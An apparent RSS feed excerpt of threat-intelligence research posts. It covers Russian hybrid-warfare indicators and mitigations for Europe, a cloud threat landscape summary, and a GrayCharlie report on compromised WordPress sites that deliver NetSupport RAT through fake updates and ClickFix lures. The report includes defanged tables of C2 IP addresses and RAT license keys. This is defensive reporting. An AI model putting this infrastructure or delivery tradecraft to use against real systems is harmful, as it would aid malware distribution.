        <p>Russian cyber activity affecting Europe has been broad in scope, with targeting observed across <a href="https://www.recordedfuture.com/ko/research/gru-linked-bluedelta-evolves-credential-harvesting">multiple regions and sectors</a>. If cyber operations were used for more overtly disruptive purposes, effects would likely be more pronounced in states with weaker cybersecurity maturity or slower coordinated response mechanisms, such as fragmented local-government IT environments or limited national incident response surge capacity. This does not preclude activity against major NATO states, where Russian cyber operations have historically focused more heavily on intelligence collection and access. BlueDelta’s targeting of NATO-aligned and defense-related organizations reflects continued Russian interest in strategically valuable European targets aligned with GRU intelligence requirements.</p>
        <p>Observed Russian cyber activity also provides insight into how operations could escalate if strategic conditions were to change and Russia were to launch a full-scale NGW campaign. Russian threat actors have demonstrated the ability to establish and maintain access over time, including through persistent connections and tunneling, which could be repurposed to degrade remote access services, manipulate edge-device configurations, or cause temporary service disruption. In Ukraine, cyber activity has been observed alongside influence operations and physical sabotage, including Recorded Future–tracked influence campaigns such as <a href="https://www.recordedfuture.com/ko/research/copycop-deepens-its-playbook-with-new-websites-and-targets">CopyCop</a>, which leveraged automated content replication and spoofed media infrastructure to amplify pro-Russian narratives in parallel with other forms of hybrid activity. If applied elsewhere, similar coordination could increase pressure on incident response capabilities and undermine public confidence in the reliability of essential services. Credential-harvesting operations further provide pathways beyond inbox access, including potential compromise of identity providers, VPN portals, and privileged administrative portals.</p>
        <p>Russian cyber operations have historically involved establishing and maintaining access to targeted networks over extended periods, a pattern also <a href="https://www.security.com/blog-post/ukraine-russia-attacks">documented</a> in prior campaigns in Ukraine. However, there is no public evidence demonstrating that the access currently observed in European networks is intended for future disruptive operations. If a kinetic conflict were to escalate in Europe, Russia would likely seek to expand or prioritize access within relevant networks to support intelligence collection, operational coordination, or potential disruption. Russia also has a <a href="https://www.recordedfuture.com/ko/research/dark-covenant-3-controlled-impunity-and-russias-cybercriminals">documented</a> history of tolerating or leveraging cybercriminal activity alongside state-directed operations, including overlap with criminal infrastructure and access brokers, which may allow operators to expand scale, complicate attribution, and generate disruptive effects without overtly exposing state-linked capabilities. Collectively, activity associated with BlueAlpha, BlueDelta, BlueEcho, Sandworm, and Dragonfly illustrates Russia’s ability to scale cyber operations from access and intelligence collection toward disruption if strategic conditions were to change, consistent with broader hybrid and New Generation Warfare practices.</p>
        <h3>Exploitation of European Dependence on Russian Oil and Natural Gas</h3>
        <p>Russia has long exploited other states’ dependence on its natural gas and oil to exercise leverage over them, typically by strategically <a href="https://www.reuters.com/world/poland-bulgaria-face-russian-gas-cut-ukraine-crisis-escalates-2022-04-26/">decreasing</a> supply flows, particularly during high-demand periods, such as winter. For example, in 2006, Georgia <a href="https://www.rferl.org/a/1064976.html">accused</a> Russia of intentionally cutting gas supplies during an unusually cold period to increase political pressure on Tbilisi. In the run-up to Russia’s full-scale invasion of Ukraine in February 2022, Russian state gas company Gazprom <a href="https://www.reuters.com/world/europe/gazprom-cuts-gas-flows-europe-ukraine-tensions-2021-10-06/">reduced</a> natural gas deliveries to Europe, likely in an effort to pressure Europe into abandoning a unified stance on supporting Ukraine.</p>
        <p>Since 2022, many NATO states have sought to <a href="https://gasoutlook.com/analysis/europe-breaks-with-russian-gas-but-still-depends-on-the-u-s/">reduce</a> their dependence on Russian natural gas and oil; however, several states remain dependent, including <a href="https://pism.pl/publications/slovakia-remains-dependent-on-russian-energy">Slovakia, Hungary, and Türkiye</a>. In a full-scale New Generation Warfare campaign in Europe, Russia would very likely escalate its exploitation of those states’ dependence on Russian energy imports to demonstrate Moscow’s ability to degrade European critical infrastructure, undermine NATO unity, gauge the resilience of these states’ critical infrastructure, and test Russia’s ability to handicap critical infrastructure, should Putin decide to launch a military incursion into NATO territory.</p>
        <p>Moscow’s willingness to exploit these states’ dependence on Russian energy likely varies by state. Moscow is less likely to exploit Hungary’s dependence on Russian oil and gas, given Budapest’s <a href="https://www.bbc.com/news/articles/c058lny3pdqo">strong</a> relations with Russia. Slovakia is a more likely target, as it seeks a <a href="https://www.reuters.com/business/energy/slovakia-wants-normalise-relations-with-russia-ramping-up-gas-imports-pm-fico-2025-09-02/">positive</a> relationship with Moscow, but is likely of less strategic importance to Russia than Hungary. Moscow’s relations with Türkiye have <a href="https://carnegieendowment.org/research/2024/10/understanding-turkiyes-entanglement-with-russia">fluctuated</a> between positive and adversarial; the likelihood of exploiting Türkiye’s dependence on Russian energy imports would likely depend, in part, on how positive the overall Russia-Türkiye relationship is at that time.</p>
        <p>Escalation of economic critical infrastructure targeting would likely take the form of both more frequent and more geographically broad operations, particularly during high-demand periods such as the winter and perhaps during NATO military exercises or elections. Russia could also escalate its use of pricing manipulation to punish states that work against Russia’s strategic priorities in Ukraine, and reward pro-Russia states such as Hungary.</p>
        <p>Russia would also likely combine supply cuts with sabotage operations. For example, in 2006, Moscow <a href="https://www.reuters.com/article/world/georgia-hit-by-gas-cut-and-power-line-blast-idUSL08601420060122/">cut</a> gas supplies in Georgia at the same time it sabotaged an electricity line. Following a successful operation, pro-Russia propaganda outlets would likely amplify narratives that claim European critical infrastructure is weak and vulnerable, and that this demonstrates the inadequacy of democracy and the Western political system writ large at fulfilling basic public needs.</p>
        <p>In a New Generation Warfare campaign against Europe, Russia would be unlikely to seek permanent damage to European critical infrastructure or mass civilian harm from disruption of energy flows. Russia would also likely avoid long-term disruption of oil and gas deliveries to limit the financial impact, since oil and gas revenues <a href="https://www.reuters.com/business/energy/russias-oil-gas-budget-revenue-set-sink-46-january-reuters-calculations-show-2026-01-19/#:~:text=Summary,the%20same%20month%20in%202024.">comprise</a> roughly 25% of Russia’s annual federal revenue.</p>
        <h2>Indicators of NGW Campaign in Europe, Implications for Public and Private Sectors, and Recommended Mitigations</h2>
        <h3>Tactic: Influence Operations</h3>
        <h4>Indicators of NGW Campaign</h4>
        <ul>
          <li>Increased convergence of narratives across propaganda outlets, including state media, inauthentic social media accounts, and so on</li>
          <li>Parallel narratives tailored to each country or region</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public Sector:</strong> more pronounced political polarization; reduced public trust in government competence</li>
          <li><strong>Private Sector:</strong> brand damage if firms are targeted in influence operation (IO) campaigns; employee or executive harassment or doxxing</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Ensure communication response protocols are in place, such as rapid rebuttal measures</li>
          <li>Ensure information environment monitoring is attuned to Russia-nexus narratives so inauthentic behavior can be detected quickly</li>
        </ul>
        <h3>Tactic: Airspace Incursions by Drones and Jets</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent incursions that last longer and target strategic sites such as military training grounds, critical infrastructure nodes, and so on</li>
          <li>Incursions are conducted at lower altitudes, with transponders turned off</li>
          <li>Violations are clustered around NATO decisions or major military exercises</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> forced closures of critical infrastructure sites during airspace violations, thereby disrupting operations, as well as likely escalation of public alarm and potential decrease in public confidence in the government’s ability to keep critical infrastructure safe</li>
          <li><strong>Private:</strong> business operation disruptions due to critical infrastructure closures</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Strengthen counter-measures against unmanned aircraft systems (UASs) around critical sites</li>
          <li>Ensure joint civil-military air incident protocols are in place, including aviation alerts and Notice to Airmen (NOTAM) coordination</li>
          <li>Improve GPS resilience</li>
        </ul>
        <h3>Tactic: Territorial Waters Violations and Targeting of Undersea Cables</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent territorial waters violations</li>
          <li>Violations by state-linked vessels</li>
          <li>Non-compliance with escort or hails; risky maneuvering around NATO state vessels, perhaps to provoke potential collisions</li>
          <li>Increased loitering of suspicious vessels near cable routes and landing areas</li>
          <li>Repeated “anchor drag” incidents</li>
          <li>Interference with repair ships</li>
          <li>Simultaneous cyber activity against telecommunications and energy operators</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> intermittent communications degradation; potential harm to energy infrastructure</li>
          <li><strong>Private:</strong> major potential operational losses for telecommunications, finance, and other key sectors; potential increases in insurance costs for shipping companies, should territorial waters violations at ports become common</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Consider mapping alternative sea routes in case primary routes are disrupted; consider rapid reroute contracts</li>
          <li>Ensure sufficient port and state coordination</li>
          <li>Ensure physical hardening at cable landing sites</li>
          <li>Expand Baltic Sentry efforts to other locations</li>
        </ul>
        <h3>Tactic: Sabotage Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent operations, including arson, vandalism, explosions, and rail disruptions</li>
          <li>Targeting of high-priority sites, such as military logistics hubs, defense suppliers, and so on</li>
          <li>Targeting of civilian sites, such as shopping malls or residential neighborhoods</li>
          <li>Concurrent operations in multiple geographic regions, suggesting intentional planning</li>
          <li>Combined sabotage operations and airspace or territorial waters violations</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> potential reduction in public confidence in government’s ability to protect critical infrastructure and residential areas; in the event of significant escalation in sabotage operations, emergency services could be strained</li>
          <li><strong>Private:</strong> facility damage or loss; threat to worker safety; supply chain interruption; business interruption; reputational liability</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Expand insider threat and contractor vetting at critical infrastructure sites</li>
          <li>Ensure physical security measures are in place, including perimeter detection, anti-drone measures, camera coverage, and access control</li>
          <li>Enhance public-private partnerships, as most of the critical infrastructure NATO relies upon is commercially owned</li>
          <li>Ensure rapid liaison channels with law enforcement and intelligence services</li>
        </ul>
        <h3>Tactic: Offensive Cyber Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Campaigns that target strategic pressure points, such as logistics and transportation hubs, defense supply chains, and local government entities</li>
          <li>Intrusion and distributed denial-of-service (DDoS) activity spikes at politically significant moments, including elections, military exercises, or geopolitical summits</li>
          <li>Campaigns that blend state and proxy activity, such as hacktivist DDoS campaigns that amplify Kremlin-aligned narratives</li>
          <li>Coupling of multiple tactics, such as cyber and influence operation hybrid campaigns</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> DDoS and ransomware campaigns can undermine public confidence in the reliability of institutions; compromise of government narratives can result in less public confidence in the truth of government messaging; even attempted election manipulation can reduce confidence in voting systems</li>
          <li><strong>Private:</strong> elevated risk of disruption of key logistics, transport, rail, and aviation systems; hack and leak operations pose risk to reputation, personally identifiable information, and intellectual property rights; targeting of critical infrastructure can result in operational disruption</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Enforce phishing-resistant multi-factor authentication</li>
          <li>Implement conditional network access based on geopolitical and risk factors</li>
          <li>Patch for commonly exploited software</li>
          <li>Reduce exposure (lock down admin portals; restrict by IP address; remove unused services)</li>
          <li>Use DDoS protection, autoscaling</li>
          <li>Coordinate with the national computer emergency response team (CERT) and National Counterintelligence and Security Center (NCSC), as well as upstream providers; rehearse continuity plans</li>
          <li>Require multi-factor authentication (MFA) and logging parity from third-party providers; segment privileged access; monitor for abnormal remote management activity</li>
        </ul>
        <h3>Tactic: Leveraging Economic Dependence</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Supply manipulation, including threats or actions to raise price volatility</li>
          <li>Exploitation of legal measures, including sudden contract disputes or claims of force majeure</li>
          <li>More frequent cessation of oil and gas supplies, especially during high-demand periods such as winter</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> higher energy bills and supply disruption, potentially leading to public dissatisfaction</li>
          <li><strong>Private:</strong> price shocks, supply uncertainty, costs related to resolving alleged contract disputes</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Diversify suppliers and routes</li>
          <li>Ensure on-site backup generation where feasible</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_17cedbb65db54e421fed3abc0cc62f5ed6f6fa0aa.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Cloud Threat Hunting and Defense Landscape]]></title>
            <link>https://www.recordedfuture.com/ko/research/2025-cloud-threat-hunting-defense-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/2025-cloud-threat-hunting-defense-landscape</guid>
            <pubDate>Thu, 19 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat actors are doubling down on cloud infrastructure — exploiting misconfigurations, abusing native services, and pivoting through hybrid environments to maximize impact. See how attack patterns are evolving across exploitation, ransomware, credential abuse, and AI service targeting in this latest cloud threat roundup.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:</p>
        <ul>
          <li>Exploitation and Misconfiguration</li>
          <li>Cloud Abuse</li>
          <li>Cloud Ransomware</li>
          <li>Credential Abuse, Account Takeover, and Unauthorized Access</li>
          <li>Third-Party Compromise</li>
        </ul>
        <p>Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateways, and enterprise resource planning (ERP) platforms — as well as stolen or weakly governed credentials sourced from public leaks, compromised developer workstations, and socially engineered helpdesk workflows. Once inside a targeted environment, threat actors systematically pivot through hybrid identity and virtual private network (VPN) infrastructure, targeting directory-synchronized accounts, non-human and executive identities, and privileged cloud roles to gain tenant-wide administrative control.</p>
        <p>Post-compromise activity is characterized by heavy use of built-in cloud and SaaS functionality: enumerating and exfiltrating data via native storage and backup services, destroying or encrypting cloud backups and snapshots for impact, manipulating static frontends and continuous integration/continuous deployment (CI/CD) pipelines to subvert trust in applications and repositories, and using mainstream platforms such as calendar services as covert command-and-control (C2) channels.</p>
        <p>In comparison to its previous <a href="https://www.recordedfuture.com/ko/research/cloud-threat-hunting-defense-landscape">iteration</a>, the majority of the events discussed in this report indicate that threat actors are engaging in similar threat behaviors; however, there are three specific trends that appear to have emerged since the most recent iteration:</p>
        <ul>
          <li>Cloud threat actors are registering their own legitimate cloud resources for use in attack chains.</li>
          <li>DDOS attacks are becoming less effective when targeting cloud environments, even in instances of record-breaking throughput, due to increased cloud-native capabilities for mitigating these threats.</li>
          <li>Cloud threat actors are increasingly diversifying the types of services that they target in victim environments during an attack chain, with a notable focus on LLM and other AI-powered services hosted in cloud environments.</li>
        </ul>
        <p>The trends associated with abuse indicate a shift in threat actor perception, demonstrating that threat actors are exploring the broader benefits that compromised cloud services can provide.</p>
        <p><strong><a href="https://assets.recordedfuture.com/Executive-Insights/CTA-20260219_Cloud_Threat_Landscape_Exec_Report.pdf">Download Cloud Threat Landscape: Executive Insights</a></strong></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1dd2d1174c3e28d579004a1fe4f44c24107a72547.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GrayCharlie Hijacks Law Firm Sites in Suspected Supply-Chain Attack]]></title>
            <link>https://www.recordedfuture.com/ko/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack</guid>
            <pubDate>Wed, 18 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[GrayCharlie turns compromised WordPress sites into malware delivery machines. Discover how this threat actor chains fake browser updates and ClickFix lures to deploy NetSupport RAT, Stealc, and SectopRAT.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has been monitoring GrayCharlie, a threat actor overlapping with SmartApeSG and active since mid-2023, for some time, and is now publishing its first report on the group. GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. These infections often progress to the deployment of Stealc and SectopRAT. Insikt Group identified a large amount of infrastructure linked to GrayCharlie, primarily tied to MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, both actor-controlled and compromised staging infrastructure, and higher-tier infrastructure used to administer operations. While most compromised websites appear to be opportunistic and span numerous industries, Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider.</p>
        <p>To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the <strong>Mitigations</strong> section of this report for implementation guidance and <strong>Appendix A</strong> for a complete list of indicators of compromise (IoCs).</p>
        <h2>Key Findings</h2>
        <ul>
          <li>GrayCharlie, which overlaps with SmartApeSG and first emerged in mid-2023, is a threat actor that injects links to externally hosted JavaScript into compromised WordPress sites. These links redirect victims to NetSupport RAT infections delivered via fake browser update pages or ClickFix techniques, ultimately resulting in Stealc and SectopRAT infections.</li>
          <li>Insikt Group identified a wide range of GrayCharlie infrastructure, largely associated with MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, staging infrastructure made up of both actor-controlled and compromised infrastructure, as well as components of GrayCharlie’s higher-tier infrastructure used to manage its operations.</li>
          <li>Insikt Group identified two primary attack chains associated with GrayCharlie: one in which victims encounter fake browser update pages after visiting compromised websites, and another in which they are presented with a ClickFix pop-up, a technique that has become increasingly common in 2025.</li>
        </ul>
        <h2>Background</h2>
        <p>GrayCharlie is Insikt Group’s designation for a threat activity group that first appeared in mid-2023 and is behind SmartApeSG, also referred to as ZPHP or HANEYMANEY. The group’s operations typically involve injecting malicious JavaScript into legitimate but compromised WordPress sites. Visitors to these sites are shown convincing, browser-specific fake update prompts (such as for Chrome, Edge, or Firefox) that encourage them to download what appears to be an update but is actually malware.</p>
        <p>In late March or early April 2025, SmartApeSG <a href="https://www.malware-traffic-analysis.net/2025/06/18/index.html">shifted</a> from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix.</p>
        <p>GrayCharlie predominantly delivers NetSupport RAT; however, deployments of Stealc and, more recently, SectopRAT, have been observed in rare instances. The group’s ultimate objectives remain uncertain. Current evidence suggests a focus on data theft and financial gain, with a theoretical, but unsubstantiated, possibility that it may sell or transfer access to other threat actors.</p>
        <h2>Threat Analysis</h2>
        <p>Insikt Group has been tracking GrayCharlie for an extended period and has observed the actor’s persistent behavior since its emergence in 2023. GrayCharlie continues to conduct the same types of operations, regularly deploying large volumes of new infrastructure and adhering to consistent tactics, techniques, and procedures (TTPs), including continued use of the same infection chains and NetSupport RAT payloads. The group targets organizations worldwide, with a particular focus on the US. The following sections provide a detailed examination of GrayCharlie’s operational infrastructure and its two primary attack chains.</p>
        <h3>Infrastructure Analysis</h3>
        <h4>NetSupport RAT Clusters</h4>
        <p>Insikt Group identified two main NetSupport RAT clusters linked to GrayCharlie based on factors such as TLS certificates, NetSupport serial numbers and license keys, and the timing of the activity (see <strong>Figure 1</strong>). In addition, Insikt Group identified a range of other NetSupport RAT C2 servers linked to GrayCharlie activity, but which are not currently attributed to either of the two main clusters. Insikt Group assesses that these clusters may correspond either to different individuals associated with GrayCharlie or to distinct GrayCharlie campaigns. The clusters are further described below.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_14fd6cf6079b29690c9ef99e5ec9308e54ce5364d.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="618" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Overview of GrayCharlie clusters observed in 2025 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h5>Cluster 1</h5>
        <p>Cluster 1 comprises NetSupport RAT C2 servers whose TLS certificates display a recurring monthly naming pattern. All servers in this cluster are hosted by MivoCloud and were deployed between March and August 2025. Notably, NetSupport RAT samples associated with the cluster’s March and April infrastructure used the license key <code>DCVTTTUUEEW23</code> and serial number <code>NSM896597</code>, before shifting to the license key <code>EVALUSION</code> and serial number <code>NSM165348</code> in subsequent deployments. The C2 servers associated with this cluster are listed in <strong>Table 1</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>194[.]180[.]191[.]51</div>
            <div>mar5</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]168</div>
            <div>mar4</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]171</div>
            <div>mar3</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]60</div>
            <div>mar1</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]17</div>
            <div>mar2</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]66</div>
            <div>apr2</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]81</div>
            <div>apr3</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>185[.]225[.]17[.]74</div>
            <div>apr4</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]189</div>
            <div>apr1</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]123</div>
            <div>may5</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]104</div>
            <div>may1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]115</div>
            <div>may2</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]118</div>
            <div>may3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]131</div>
            <div>may4</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]137</div>
            <div>may53</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]13</div>
            <div>june2</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]174</div>
            <div>june6</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]140</div>
            <div>june1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]30</div>
            <div>june7</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]63</div>
            <div>june3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]111</div>
            <div>june7</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]135</div>
            <div>june5ebatquot</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]23</div>
            <div>july9</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]41</div>
            <div>july1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]61</div>
            <div>july3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]73</div>
            <div>july4</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]87</div>
            <div>july6</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]97</div>
            <div>july8</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]130</div>
            <div>july9</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>NetSupport RAT C2 servers linked to Cluster 1 (Source: Recorded Future)</em></p>
        <p>Notably, the NetSupport RAT C2 servers in Cluster 1 are connected not only through the characteristics previously described, but also by the near-simultaneous creation of their TLS certificates. For example, the TLS certificate with the common name <code>june5ebatquot</code> associated with IP address <em>94[.]158[.]245[.]135</em> was generated on June 30, 2025 at 4:55:20 PM, while the certificate with the common name june6 linked to <em>94[.]158[.]245[.]174</em> was created only 20 seconds later.</p>
        <h5>Cluster 2</h5>
        <p>Cluster 2 comprises NetSupport RAT command-and-control servers whose TLS certificates typically start with two or more repetitions of “s”, followed by an “i” and a number (so “<code>sssi3</code>”, for example). NetSupport RAT samples linked to Cluster 2 used the license key <code>XMLCTL</code> and serial number <code>NSM303008</code>. The NetSupport RAT C2 servers typically also host an instance of the vulnerability scanner Acunetix. The C2 servers associated with this cluster are listed in <strong>Table 2</strong>. Notably, all TLS certificates associated with this cluster were created in a single batch on June 17, 2025.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>5[.]181[.]159[.]112</div>
            <div>sssi3</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]9</div>
            <div>ssi1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]38</div>
            <div>sssi2</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]140</div>
            <div>ssssi6</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]143</div>
            <div>ssssi8</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]142</div>
            <div>sssssi7</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]139</div>
            <div>ssssi5</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
        </div>
        <p><em><strong>Table 2:</strong></em> <em>NetSupport RAT C2 servers linked to Cluster 2 (Source: Recorded Future)</em></p>
        <p>Of note, one NetSupport RAT C2 server (<em>94[.]158[.]245[.]56</em>) used a TLS certificate with the common name 23sss, created in May 2025, and was linked to a NetSupport RAT sample that carried the same license key (<code>EVALUSION</code>) and serial number (<code>NSM165348</code>) previously observed in Cluster 1.</p>
        <h5>Other NetSupport RAT C2 Servers</h5>
        <p>Insikt Group identified an additional set of NetSupport RAT C2 servers linked to GrayCharlie that did not form a distinct cluster (see <strong>Table 3</strong>). However, all the servers were hosted by MivoCloud and were associated with NetSupport RAT samples using license key and serial number combinations observed in Clusters 1 and 2.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>5[.]181[.]159[.]29</div>
            <div>ssdecservicsdes</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]18</div>
            <div>papichssd2</div>
            <div>DCVTTTUUEEW2</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]153</div>
            <div>kosmo2</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]170</div>
            <div>normvork</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]62</div>
            <div>ffdds</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]181[.]156[.]234</div>
            <div>wedn1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]35</div>
            <div>scgs234123</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]209</div>
            <div>novemsdf</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]156[.]244</div>
            <div>wends4</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]121</div>
            <div>novaksuur</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>5[.]252[.]177[.]120</div>
            <div>lohsd</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]252[.]177[.]15</div>
            <div>bounce</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]16</div>
            <div>update1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
        </div>
        <p><em><strong>Table 3:</strong></em> <em>Additional NetSupport RAT C2 servers linked to GrayBravo (Source: Recorded Future)</em></p>
